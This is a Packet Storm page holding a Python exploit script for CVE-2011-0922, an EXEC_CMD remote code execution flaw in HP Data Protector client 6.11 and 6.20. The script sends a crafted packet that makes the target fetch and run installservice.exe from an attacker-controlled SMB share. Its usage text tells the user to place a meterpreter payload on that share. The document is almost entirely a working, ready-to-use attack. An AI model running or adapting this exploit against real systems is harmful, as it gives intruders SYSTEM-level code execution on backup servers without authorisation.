HP Data Protector client versions 6.11 and 6.20 suffer from an EXEC_CMD remote code execution vulnerability.
5d34993adf845edd6d894d448162c3ced97c1186b2c7b70f5c29bfbe0a5da886#!/usr/bin/env python
# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability
# Date: 2012-12-06
# Exploit Author: Ben Turner
# Vendor Homepage: www.hp.com
# Version: 6.11 & 6.20
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
import socket
import sys
import binascii
if len(sys.argv) != 4:
print ""
print "\033[0;31mUsage: ./hp_protector.py <Target IP> <Port> <Reverse IP> \033[0m"
print ""
print "\033[0;32mMake sure you create a meterpreter payload and a share with the following \\\\<Reverse IP>\\Omniback\\i386\\installservice.exe\033[0m"
print "\033[0;32mAlso make sure the SYSTEM account on windows can access your share, this is not always trivial\033[0m"
print ""
sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
lhost = sys.argv[3]
# Create a Share with the following:
# Ensure you can access that share with the SYSTEM account on a machine -
#
# \\ipaddress\Omniback\i386\installservice.exe
b = ''
for char in lhost:
a = "\x00"+char
b = b + a
#print b
payload = ("\x00\x00\x01\xbe\xff\xfe\x32\x00\x00\x00\x20"
+ b +
"\x00\x00\x00\x20\x00\x30\x00"
"\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00"
"\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00"
"\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00"
"\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00"
"\x5c"
+ b +
"\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00"
"\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
"\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00"
"\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00"
"\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00"
"\x72\x00\x63\x00\x65\x00\x20\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62"
"\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x5c\x00\x5c"
+ b +
"\x5c\x00\x5c\x00\x4f\x00"
"\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00"
"\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00"
"\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00"
"\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00"
"\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00"
"\x5c\x00\x5c"
+ b +
"\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
"\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00\x02\x54"
"\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00"
"\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00"
"\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c"
+ b +
"\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
"\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00")
print payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
while 1:
data = s.recv(4096)
if data:
print data
else:
break
s.close()
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed